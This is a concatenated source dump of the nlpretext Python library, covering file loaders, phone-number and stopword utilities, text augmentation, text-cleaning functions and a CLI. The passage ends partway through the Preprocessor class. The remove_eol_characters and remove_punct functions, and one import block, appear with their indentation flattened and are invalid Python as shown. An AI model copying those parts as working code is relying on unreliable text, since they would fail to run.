FILE: nlpretext/_utils/pandasloader.py
================================================
from typing import List, Union
import pandas as pd
from fsspec import open_files
def _list_handler(func):
    """
    Decorator turning a single-file pandas reader into one that accepts a
    path, a wildcard pattern or a list of paths, concatenating the partial
    DataFrames into one.
    """
    from functools import wraps  # local import: keeps the file's import block untouched

    @wraps(func)  # fix: preserve the wrapped reader's __name__/__doc__ for introspection
    def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame:  # type: ignore
        matched_files = open_files(file_path)
        frames = [func(file.path, *args, **kwargs) for file in matched_files]
        return pd.concat(frames)

    return wrapper_list_handler
@_list_handler
def read_text(file_path: str, encoding: str) -> pd.DataFrame:
    """Read a text file into a single-column DataFrame (one row per line)."""
    # colspecs=[(None, None)] makes read_fwf treat each whole line as one field.
    return pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)])
@_list_handler
def read_json(file_path: str, encoding: str) -> pd.DataFrame:
    """Read a JSON file into a DataFrame."""
    return pd.read_json(file_path, encoding=encoding)
@_list_handler
def read_csv(file_path: str, encoding: str) -> pd.DataFrame:
    """Read a CSV file into a DataFrame."""
    return pd.read_csv(file_path, encoding=encoding)
@_list_handler
def read_parquet(file_path: str, encoding: str) -> pd.DataFrame:
    """Read a Parquet file into a DataFrame.

    NOTE(review): ``pd.read_parquet`` has no ``encoding`` parameter of its
    own (extra kwargs are forwarded to the engine) — verify this path is
    actually used with an engine that accepts it.
    """
    return pd.read_parquet(file_path, encoding=encoding)
================================================
FILE: nlpretext/_utils/phone_number.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from typing import List, Optional
import phonenumbers as _phonenumbers
from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY
def find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]:
    """
    Python port of Google's libphonenumber.
    https://github.com/daviddrysdale/python-phonenumbers.

    Parameters
    ----------
    string : str
        text to search for phone numbers
    region_code : str, optional
        If specified, will find the number of the specified country.
        eg. 06.00.00.00.00 if "FR" is specified.
        If not specified, only works for international-formatted phone numbers.
        - ie. phone number with +country code specified
        eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
        supported value: look SUPPORTED_COUNTRY variable.

    Returns
    -------
    list
        list of matched phone numbers.

    Raises
    ------
    ValueError
        if country code is not supported.
    """
    if region_code not in SUPPORTED_COUNTRY:
        # fix: message previously misspelled "contry"
        raise ValueError("Please enter a valid country code. See SUPPORTED_COUNTRY list.")
    return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]
def extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:
    """
    Find phone numbers in a text, returns a list of phone numbers.

    Parameters
    ----------
    text : str
    countrylist : list (eg. [None,'FR','US','GB'])
        Look for phone numbers formatted according to the specified country list.
        supported value: look SUPPORTED_COUNTRY variable.

    Returns
    -------
    list
        List of unique phone numbers found.
    """
    unique_numbers = {
        number
        for region in countrylist
        for number in find_phone_numbers(text, region_code=region)
    }
    return list(unique_numbers)
class PhoneParser:
    """
    Python port of Google's libphonenumber.
    https://github.com/daviddrysdale/python-phonenumbers.

    Stateful wrapper: ``parse_number`` stores the parsed number on the
    instance so that ``format_number`` can reformat it afterwards.
    """

    def __init__(self) -> None:
        # Inputs of the most recent parse_number() call.
        self.region_code: Optional[str] = None
        self.text: Optional[str] = None
        # Result of the most recent parse_number() call; None until then.
        # The former property/setter pair around this attribute performed no
        # validation or computation, so it was replaced by a plain attribute
        # (public read/write access is unchanged).
        self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None

    def parse_number(
        self, text: str, region_code: Optional[str] = None
    ) -> Optional[_phonenumbers.PhoneNumber]:
        """
        Extract phone number from text.

        Parameters
        ----------
        text: str
        region_code : str, optional
            If specified, will find the number of the specified country.
            eg. 06.00.00.00.00 if "FR" is specified.
            If not specified, only works for international-formatted phone numbers.
            - ie. phone number with +country code specified
            eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
            supported value: look SUPPORTED_COUNTRY variable.

        Returns
        -------
        str
            The parsed number

        Raises
        ------
        NumberParseException
            If the string doesn't contains phone number of is the parser fails.
        """
        self.region_code = region_code
        self.text = text
        self.parsed_num = _phonenumbers.parse(self.text, self.region_code)
        return self.parsed_num

    def format_number(self, num_format: str) -> str:
        """
        Convert a phone number to another standard format.

        Parameters
        ----------
        num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'}

        Returns
        -------
        str
            Number formatted

        Raises
        ------
        ValueError
            If ``num_format`` is unknown or no number was parsed beforehand.
        """
        standard_format = FORMAT_NUMBERS.get(num_format)
        if standard_format is None:
            raise ValueError(f"Please choose a num_format in {list(FORMAT_NUMBERS.keys())}")
        if self.parsed_num is None:
            raise ValueError(f"Could not parse phone number {self.parsed_num}")
        formatted_number: Optional[str] = _phonenumbers.format_number(
            self.parsed_num, standard_format
        )
        if formatted_number is None:
            raise ValueError(f"Could not format phone number {formatted_number}")
        return formatted_number
================================================
FILE: nlpretext/_utils/stopwords.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List
from nlpretext._config.stopwords import STOPWORDS
from stop_words import LANGUAGE_MAPPING as _LANGUAGE_MAPPING
from stop_words import get_stop_words as _get_stop_words
def get_stopwords(lang: str = "en") -> List[str]:
    """Input a language code, returns a list of stopwords for the specified language.

    Combines the stopwords shipped by the ``stop_words`` package with this
    package's custom stopword lists, deduplicated.

    Parameters
    ----------
    lang : str
        Two-letter language code, e.g. 'en', 'fr', 'hi'. The union of the
        languages supported by the ``stop_words`` library and the custom
        STOPWORDS mapping is accepted.

    Returns
    -------
    list
        list of stopwords for a given language

    Raises
    ------
    ValueError
        When language is not available yet or incorrect country code
    """
    if not (isinstance(lang, str) and len(lang) == 2):
        raise ValueError('Please input a valid country code, in 2 letters. Eg. "us" for USA. ')
    code = lang.lower()
    lib_langs = list(_LANGUAGE_MAPPING.keys())
    custom_langs = list(STOPWORDS.keys())
    supported_lang = lib_langs + custom_langs
    if code not in supported_lang:
        raise ValueError(
            "Language not available yet or incorrect country code."
            f" Supported languages: {supported_lang}"
        )
    words: List[str] = []
    if code in lib_langs:
        words += _get_stop_words(code)
    if code in custom_langs:
        words += STOPWORDS[code]
    return list(set(words))
================================================
FILE: nlpretext/augmentation/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/augmentation/text_augmentation.py
================================================
from typing import Any, Dict, List, Optional, Tuple
import logging
import re
from itertools import combinations
import nlpaug.augmenter.word as naw
class CouldNotAugment(ValueError):
    """Raised when the augmentation altered at least one entity of the text, making the augmented text unusable."""

    pass
class UnavailableAugmenter(ValueError):
    """Raised when the requested augmentation method is not a supported augmenter."""

    pass
def augment_text(
    text: str,
    method: str,
    stopwords: Optional[List[str]] = None,
    entities: Optional[List[Dict[str, Any]]] = None,
) -> Tuple[str, List[Dict[str, Any]]]:
    """
    Produce an augmented variant of ``text`` using the chosen augmenter.

    Words may be substituted (synonym or BERT-based) depending on ``method``.
    Entities passed in are expected to survive the augmentation unchanged;
    words listed in ``stopwords`` are frozen as well.

    Parameters
    ----------
    text : string
    method : {'wordnet_synonym', 'aug_sub_bert'}
        augmenter to use ('wordnet_synonym' or 'aug_sub_bert')
    stopwords : list, optional
        list of words to freeze throughout the augmentation
    entities : list, optional
        entities associated to text if any, each formatted as
        {'entity': str, 'word': str, 'startCharIndex': int, 'endCharIndex': int}

    Returns
    -------
    Augmented text and optional augmented entities
    """
    augmenter = get_augmenter(method, stopwords)
    augmented_text = augmenter.augment(text)
    if entities is None:
        return augmented_text, []
    return process_entities_and_text(entities, text, augmented_text)
def process_entities_and_text(
    entities: List[Dict[str, Any]], text: str, augmented_text: str
) -> Tuple[str, List[Dict[str, Any]]]:
    """
    Verify that the initial entities survived the augmentation and, if so,
    recompute their positions in the augmented text.

    Parameters
    ----------
    entities: list
        entities associated to text, each formatted as
        {'entity': str, 'word': str, 'startCharIndex': int, 'endCharIndex': int}
    text: str
        initial text
    augmented_text: str
        new text resulting of data augmentation operation

    Returns
    -------
    Augmented text and entities with their updated position in augmented text

    Raises
    ------
    CouldNotAugment
        If at least one entity word is no longer present in the augmented text.
    """
    if not are_entities_in_augmented_text(entities, augmented_text):
        raise CouldNotAugment("Text was not correctly augmented because entities were altered")
    # (word, label) pairs; the word is re-extracted from the original text via
    # the entity's character span rather than taken from the 'word' field.
    formatted_entities = [
        (text[entity["startCharIndex"] : entity["endCharIndex"]].strip(), entity["entity"])
        for entity in entities
    ]
    augmented_entities = get_augmented_entities(augmented_text, formatted_entities)
    clean_entities = clean_sentence_entities(augmented_text, augmented_entities)
    return augmented_text, clean_entities
def are_entities_in_augmented_text(entities: List[Dict[str, Any]], augmented_text: str) -> bool:
    """
    Given a list of entities, check if all the words associated to each entity
    are still present in augmented text.

    Parameters
    ----------
    entities : list
        entities associated to initial text, each formatted as
        {'entity': str, 'word': str, 'startCharIndex': int, 'endCharIndex': int}
    augmented_text : str

    Returns
    -------
    bool
        True if all entities are present in augmented text, False otherwise
    """
    # Idiomatic replacement of the original flag-variable loop: True only when
    # every entity's word is a substring of the augmented text (True for []).
    return all(ent["word"] in augmented_text for ent in entities)
def get_augmenter(method: str, stopwords: Optional[List[str]] = None) -> naw.SynonymAug:
    """
    Build the nlpaug augmenter matching ``method``.

    Parameters
    ----------
    method : str (supported methods: wordnet_synonym and aug_sub_bert)
    stopwords : list
        list of words to freeze throughout the augmentation

    Returns
    -------
    Initialized nlpaug augmenter

    Raises
    ------
    UnavailableAugmenter
        If ``method`` is not one of the supported augmenters.
    """
    if method == "aug_sub_bert":
        return naw.ContextualWordEmbsAug(
            model_path="bert-base-uncased", action="substitute", stopwords=stopwords
        )
    if method == "wordnet_synonym":
        return naw.SynonymAug(aug_src="wordnet", stopwords=stopwords)
    raise UnavailableAugmenter(
        "The given augmenter is not supported. You must choose one \
        of the following: wordnet_synonym or aug_sub_bert"
    )
def get_augmented_entities(
    sentence_augmented: str, entities: List[Tuple[str, Any]]
) -> List[Dict[str, Any]]:
    """
    Get entities with updated positions (start and end) in augmented text.

    Parameters
    ----------
    sentence_augmented : str
        augmented text
    entities : list
        (word, label) tuples for the entities of the initial text

    Returns
    -------
    Entities with updated positions related to augmented text, each formatted as
    {'entity': str, 'word': str, 'startCharIndex': int, 'endCharIndex': int}.
    Entities whose word is not found in the augmented text are dropped.
    """
    entities_augmented = []
    for entity_word, entity_label in entities:
        # fix: escape the entity text — it is plain text, not a regex pattern.
        # Without re.escape, words containing metacharacters (e.g. "C++",
        # "(a)") would raise re.error or match the wrong span.
        match = re.search(re.escape(entity_word.strip()), sentence_augmented)
        if match:
            start_index, end_index = match.start(), match.end()
            entities_augmented.append(
                {
                    "entity": entity_label,
                    "word": sentence_augmented[start_index:end_index],
                    "startCharIndex": start_index,
                    "endCharIndex": end_index,
                }
            )
    return entities_augmented
def clean_sentence_entities(text: str, entities: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """
    Paired entities check to remove nested entities, the longest entity is kept.

    Parameters
    ----------
    text : str
        augmented text
    entities : list
        entities associated to augmented text, each formatted as
        {'entity': str, 'word': str, 'startCharIndex': int, 'endCharIndex': int}

    Returns
    -------
    Cleaned entities (deduplicated, with nested entities removed)
    """
    # Deduplicate entities via frozenset of their items.
    entities_to_clean = [dict(s) for s in {frozenset(d.items()) for d in entities}]
    for element1, element2 in combinations(entities_to_clean, 2):
        result = check_interval_included(element1, element2)
        if result is not None:
            try:
                entities_to_clean.remove(result[0])
            # fix: list.remove raises ValueError (not IndexError) when the item
            # is absent — e.g. already removed by an earlier overlapping pair.
            # The previous IndexError handler could never trigger.
            except ValueError:
                logging.warning(
                    "Cant remove entity : {} \n entities are now :{} \n for sentence : {} ".format(
                        result, entities_to_clean, text
                    )
                )
                continue
    return entities_to_clean
def check_interval_included(
    element1: Dict[str, Any], element2: Dict[str, Any]
) -> Optional[Tuple[Dict[str, Any], Dict[str, Any]]]:
    """
    Decide whether one of two entities is nested in, or overlaps, the other.

    Parameters
    ----------
    element1 : dict
    element2 : dict
        both of them formatted as
        {'entity': str, 'word': str, 'startCharIndex': int, 'endCharIndex': int}

    Returns
    -------
    A (element to remove, element to keep) tuple when one of the two should
    be dropped; None when the entities are identical or disjoint.
    """
    if element1 == element2:
        return None
    start1, end1 = element1["startCharIndex"], element1["endCharIndex"]
    start2, end2 = element2["startCharIndex"], element2["endCharIndex"]
    # element1 fully contained in element2
    if start1 >= start2 and end1 <= end2:
        return element1, element2
    # element2 fully contained in element1
    if start2 >= start1 and end2 <= end1:
        return element2, element1
    # element1 starts inside element2 but ends at or after its end
    if start1 >= start2 and end1 >= end2 and start1 <= end2 - 1:
        return element1, element2
    # element2 starts inside element1 but ends at or after its end
    # NOTE(review): the strict `<` here vs `<=` in the mirrored branch above
    # is preserved from the original — confirm the asymmetry is intended.
    if start2 >= start1 and end2 >= end1 and start2 < end1 - 1:
        return element2, element1
    return None
================================================
FILE: nlpretext/basic/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/basic/preprocess.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from typing import List, Optional
import re
import unicodedata
from flashtext import KeywordProcessor
from ftfy import fix_text as _fix_text
from nlpretext._config import constants
from nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers
from nlpretext._utils.stopwords import get_stopwords
from nlpretext.token.tokenizer import tokenize
def normalize_whitespace(text: str) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Collapse every run of spaces in ``text`` into a single space and every
    run of linebreaks into a single newline, then strip leading/trailing
    whitespace.
    eg. " foo  bar " -> "foo bar"

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    single_newlines = constants.LINEBREAK_REGEX.sub(r"\n", text)
    return constants.NONBREAKING_SPACE_REGEX.sub(" ", single_newlines).strip()
def remove_whitespace(text: str) -> str:
    """
    Delete every spacing and linebreak character from ``text``, and strip
    leading/trailing whitespace.
    eg. " foo bar " -> "foobar".

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    no_linebreaks = constants.LINEBREAK_REGEX.sub("", text)
    no_spaces = constants.NONBREAKING_SPACE_REGEX.sub("", no_linebreaks)
    return no_spaces.strip()
def lower_text(text: str) -> str:
    """
    Return ``text`` converted to lowercase.

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    lowered: str = text.lower()
    return lowered
def filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str:
    """
    Reverse a concatenated token back to its original group of words.

    A token that equals the whitespace-stripped form of one of the
    ``ignored_stopwords`` groups is replaced by that original group.

    Parameters
    ----------
    token : string
    ignored_stopwords : list of strings

    Returns
    -------
    string
    """
    result = token
    if ignored_stopwords:
        # Keep the original iteration order: each match rebinds the value
        # that subsequent comparisons are made against.
        for group in ignored_stopwords:
            if result == remove_whitespace(group):
                result = group
    return result
def ungroup_ignored_stopwords(
    tokens: List[str], ignored_stopwords: Optional[List[str]] = None
) -> List[str]:
    """
    Reverse concatenated tokens back to their original (ungrouped) form.

    Parameters
    ----------
    tokens : list of strings
    ignored_stopwords : list of strings

    Returns
    -------
    list of strings
    """
    ungrouped = []
    for token in tokens:
        ungrouped.append(filter_groups(token, ignored_stopwords))
    return ungrouped
def remove_stopwords(
    text: str,
    lang: str,
    custom_stopwords: Optional[List[str]] = None,
    ignored_stopwords: Optional[List[str]] = None,
) -> str:
    """
    Remove classic stopwords for a given language and custom stopwords
    given as a list from ``text``.

    Words and groups of words from ``ignored_stopwords`` are protected from
    removal: they are temporarily concatenated into single tokens so they
    survive tokenization, then restored to their original form.

    Parameters
    ----------
    text : string
    lang : string
    custom_stopwords : list of strings
    ignored_stopwords : list of strings

    Returns
    -------
    string

    Raises
    ------
    ValueError
        if ``custom_stopwords`` and ``ignored_stopwords`` have common
        elements, or if ``text`` is empty.
    """
    if custom_stopwords and ignored_stopwords:
        common_elements = set(custom_stopwords).intersection(set(ignored_stopwords))
        if common_elements:
            # Single-line message: the original used a backslash continuation
            # inside the f-string, embedding raw indentation in the message.
            raise ValueError(
                f"Found common words in custom_stopwords and ignored_stopwords: "
                f"{common_elements}. Please remove duplicated values."
            )
    # Copy before extending: get_stopwords may return a shared/cached list,
    # and extending it in place would leak custom stopwords across calls.
    stopwords = list(get_stopwords(lang))
    if ignored_stopwords:
        keyword_processor = KeywordProcessor()
        # Single-word "groups" need no ungrouping, but must still be kept.
        singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1]
        for group_of_words in ignored_stopwords:
            # Replace each protected group with its whitespace-free form so it
            # is treated as one token by the tokenizer below.
            keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))
        text = keyword_processor.replace_keywords(text)
    else:
        singletons_to_keep = []
    if custom_stopwords:
        stopwords += custom_stopwords
    if not text:
        raise ValueError("Found empty text. Please fix it before using this function.")
    if lang in ["fr", "en"]:
        lang_module = {"fr": "fr_spacy", "en": "en_spacy"}[lang]
        tokens = tokenize(text, lang_module)
    else:
        # No language-specific tokenizer available: fall back to whitespace split.
        tokens = text.split()
    tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)]
    tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords)
    return " ".join(tokens)
def remove_eol_characters(text: str) -> str:
r"""
Remove end of line (\n) char.
Parameters
----------
text : str
Returns
-------
str
"""
text = text.replace("\n", " ")
return text
def fix_bad_unicode(text: str, normalization: str = "NFC") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Fix unicode text that's "broken" using `ftfy
    <https://ftfy.readthedocs.io/>`_; this includes mojibake, HTML entities
    and other code cruft, and non-standard forms for display purposes.

    Parameters
    ----------
    text : string
    normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}):
        if 'NFC', combines characters and diacritics written using separate
        code points, e.g. converting "e" plus an acute accent modifier into
        "é"; unicode can be converted to NFC form without any change in its
        meaning! If 'NFKC', additional normalizations are applied that can
        change the meanings of characters, e.g. ellipsis characters will be
        replaced with three periods

    Returns
    -------
    string
    """
    return _fix_text(text, normalization=normalization)
def unpack_english_contractions(text: str) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Replace *English* contractions in ``text`` str with their unshortened
    forms.
    N.B. The "'d" and "'s" forms are ambiguous (had/would, is/has/possessive),
    so are left as-is.
    eg. "You're fired. She's nice." -> "You are fired. She's nice."

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    # (pattern, replacement) pairs, applied in the original order.
    substitutions = (
        (constants.CONTRACTION_NT_NOT, r"\1\2 not"),
        (constants.CONTRACTION_LL_WILL, r"\1\2 will"),
        (constants.CONTRACTION_RE_ARE, r"\1\2 are"),
        (constants.CONTRACTION_VE_HAVE, r"\1\2 have"),
        (constants.CONTRACTION_CANT_CANNOT, r"\1\2n not"),
        (constants.CONTRACTION_M_AM, r"\1\2 am"),
        (constants.CONTRACTION_LET_LETUS, r"\1\2 us"),
        (constants.CONTRACTION_WONT_WILLNOT, r"\1\2ill not"),
        (constants.CONTRACTION_SHANT_SHALLNOT, r"\1\2hall not"),
        (constants.CONTRACTION_YALL_YOUALL, r"\1\2ou all"),
    )
    for pattern, replacement in substitutions:
        text = pattern.sub(replacement, text)
    return text
def replace_urls(text: str, replace_with: str = "*URL*") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Replace all URLs in ``text`` str with ``replace_with`` str.

    Parameters
    ----------
    text : string
    replace_with : string
        the string you want the URL to be replaced with.

    Returns
    -------
    string
    """
    # Shortened URLs first, then the general pattern.
    text = constants.SHORT_URL_REGEX.sub(replace_with, text)
    return constants.URL_REGEX.sub(replace_with, text)
def replace_emails(text: str, replace_with: str = "*EMAIL*") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Replace all emails in ``text`` str with ``replace_with`` str.

    Parameters
    ----------
    text : string
    replace_with : string
        the string you want the email address to be replaced with.

    Returns
    -------
    string
    """
    return constants.EMAIL_REGEX.sub(replace_with, text)
def replace_phone_numbers(
    text: str,
    country_to_detect: List[Optional[str]],
    replace_with: str = "*PHONE*",
    method: str = "regex",
) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Inspired code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Replace all phone numbers in ``text`` str with ``replace_with`` str.

    Parameters
    ----------
    text : string
    country_to_detect : list
        If a list of country code is specified, will catch every number
        formatted. Only used when method = 'detection'.
    replace_with : string
        the string you want the phone number to be replaced with.
    method : ['regex','detection']
        regex is faster but will omit a lot of numbers, while detection will
        catch every numbers, but takes a while.

    Returns
    -------
    string

    Raises
    ------
    ValueError
        if ``method`` is neither 'regex' nor 'detection'.
    """
    if method == "regex":
        text = constants.PHONE_REGEX.sub(replace_with, text)
    elif method == "detection":
        found_nums = _extract_phone_numbers(text, countrylist=country_to_detect)
        # Order by length so truncated numbers are not replaced before the
        # full numbers that contain them.
        found_nums.sort(key=len, reverse=True)
        for phone_number in found_nums:
            text = text.replace(phone_number, replace_with)
    else:
        # Single-line message: the original used a backslash continuation
        # inside the literal, which embedded raw indentation in the message.
        raise ValueError('Please input a valid method between "regex" or "detection"')
    return text
def replace_numbers(text: str, replace_with: str = "*NUMBER*") -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Replace all numbers in ``text`` str with ``replace_with`` str.

    Parameters
    ----------
    text : string
    replace_with : string
        the string you want the number to be replaced with.

    Returns
    -------
    string
    """
    return constants.NUMBERS_REGEX.sub(replace_with, text)
def replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str:
    """
    ----
    Copyright 2016 Chartbeat, Inc.
    Code from textacy: https://github.com/chartbeat-labs/textacy
    ----
    Replace all currency symbols in ``text`` str with string specified by
    ``replace_with`` str.

    Parameters
    ----------
    text : str
        raw text
    replace_with : None or string
        if None (default), replace symbols with
        their standard 3-letter abbreviations (e.g. '$' with 'USD', '£'
        with 'GBP'); otherwise, pass in a string with which to replace all
        symbols (e.g. "*CURRENCY*")

    Returns
    -------
    string
    """
    if replace_with is not None:
        return constants.CURRENCY_REGEX.sub(replace_with, text)
    # No replacement given: substitute each symbol with its ISO code.
    for symbol, iso_code in constants.CURRENCIES.items():
        text = text.replace(symbol, iso_code)
    return text
def remove_punct(text: str, marks: Optional[str] = None) -> str:
"""
Remove punctuation from ``text`` by replacing all instances of ``marks``
with whitespace.
Parameters
----------
text : str
raw text
marks : str or None
If specified, remove only the characters in this string,
e.g. ``marks=',;:'`` removes commas, semi-colons, and colons.
Otherwise, all punctuation marks are removed.
Returns
-------
string
Note
-------
When ``marks=None``, Python's built-in :meth:`str.translate()` is
used to remove punctuation; otherwise, a regular expression is used
instead. The former's performance is about 5-10x faster.
"""
if marks:
text = re.sub(f"[{re.escape(marks)}]+", " ", text, flags=re.UNICODE)
else:
text = text.translate(constants.PUNCT_TRANSLATE_UNICODE)
return text
def remove_accents(text: str, method: str = "unicode") -> str:
    """
    Remove accents from any accented unicode characters in ``text`` str,
    either by transforming them into ascii equivalents or removing them
    entirely.

    Parameters
    ----------
    text : str
        raw text
    method : ({'unicode', 'ascii'})
        if 'unicode', remove accented
        char for any unicode symbol with a direct ASCII equivalent; if 'ascii',
        remove accented char for any unicode symbol
        NB: the 'ascii' method is notably faster than 'unicode', but less good

    Returns
    -------
    string

    Raises
    ------
    ValueError
        if ``method`` is not in {'unicode', 'ascii'}
    """
    if method == "unicode":
        # Decompose, then drop the combining marks.
        decomposed = unicodedata.normalize("NFKD", text)
        return "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    if method == "ascii":
        # Decompose and drop anything that does not survive ascii encoding.
        return unicodedata.normalize("NFKD", text).encode("ascii", errors="ignore").decode("ascii")
    msg = f'`method` must be either "unicode" and "ascii", not {method}'
    raise ValueError(msg)
def remove_multiple_spaces_and_strip_text(text: str) -> str:
    """
    Remove multiple spaces, strip text, and remove '-', '*' characters.

    Parameters
    ----------
    text : str
        the text to be processed

    Returns
    -------
    string
        the text with removed multiple spaces and strip text
    """
    # Tabs first, then any run of 2+ whitespace/'-'/'*' characters.
    for pattern in ("\t", r"[\s\-\*]{2,}"):
        text = re.sub(pattern, " ", text)
    return text.strip()
def filter_non_latin_characters(text: str) -> str:
    """
    Filter non latin characters out of ``text``, replacing them with spaces
    and normalizing the resulting whitespace.

    Parameters
    ----------
    text : string

    Returns
    -------
    string
    """
    return normalize_whitespace(constants.LATIN_CHARACTERS_RE.sub(" ", text))
================================================
FILE: nlpretext/cli/__init__.py
================================================
================================================
FILE: nlpretext/cli/__main__.py
================================================
# mypy: disable-error-code="attr-defined"
import typer
from nlpretext import __version__
from nlpretext.cli import preprocess
from rich.console import Console
# Top-level Typer application for the `nlpretext` command-line interface.
app = typer.Typer(
    name="nlpretext",
    help="All the goto functions you need to handle NLP use-cases, integrated in NLPretext",
    add_completion=True,
)
# Mount the preprocessing sub-commands under `nlpretext preprocess`.
app.add_typer(preprocess.app, name="preprocess")
# Rich console used for formatted terminal output.
console = Console()
def version_callback(value: bool) -> None:
    """Print the package version and exit when the flag is set."""
    if not value:
        return
    console.print(f"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]")
    raise typer.Exit()
================================================
FILE: nlpretext/cli/preprocess.py
================================================
from typing import List
import typer
from nlpretext.preprocessor import Preprocessor
from nlpretext.textloader import TextLoader
from rich.console import Console
# Typer sub-application holding the `preprocess` command.
app = typer.Typer()
# Rich console used to display results in the terminal.
console = Console()
@app.command()
def run(
    # NOTE(review): `input` shadows the builtin of the same name; renaming it
    # would change the CLI keyword interface, so it is kept as-is.
    input: List[str] = typer.Option(  # noqa: B008
        [],
        "-i",
        "--input",
        case_sensitive=False,
        help="List of files that will be preprocessed",
    ),
    output: str = typer.Option(
        None,
        "-o",
        "--output",
        case_sensitive=False,
        help="File that will store the result of the preprocessing",
    ),
) -> None:
    """Runs NLPretext on a list of files and outputs the result in parquet format
    or shows the result if no output is provided.

    Args:
        input: List of files that will be preprocessed
        output: File that will store the result of the preprocessing
    """
    # Defaults: text column "text" and the default cleaning pipeline.
    text_loader = TextLoader()
    preprocessor = Preprocessor()
    preprocessed_text_dataframe = text_loader.read_text(input, preprocessor=preprocessor)
    if output:
        # Persist the preprocessed dataframe in parquet format.
        preprocessed_text_dataframe.to_parquet(output)
    else:
        # No output file given: display the result in the terminal.
        console.print(preprocessed_text_dataframe)
================================================
FILE: nlpretext/preprocessor.py
================================================
from typing import Any, Callable, Dict, List, Optional
from nlpretext.basic.preprocess import fix_bad_unicode, normalize_whitespace, remove_eol_characters
from nlpretext.social.preprocess import (
remove_emoji,
remove_hashtag,
remove_html_tags,
remove_mentions,
)
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer
class Preprocessor:
    def __init__(self):
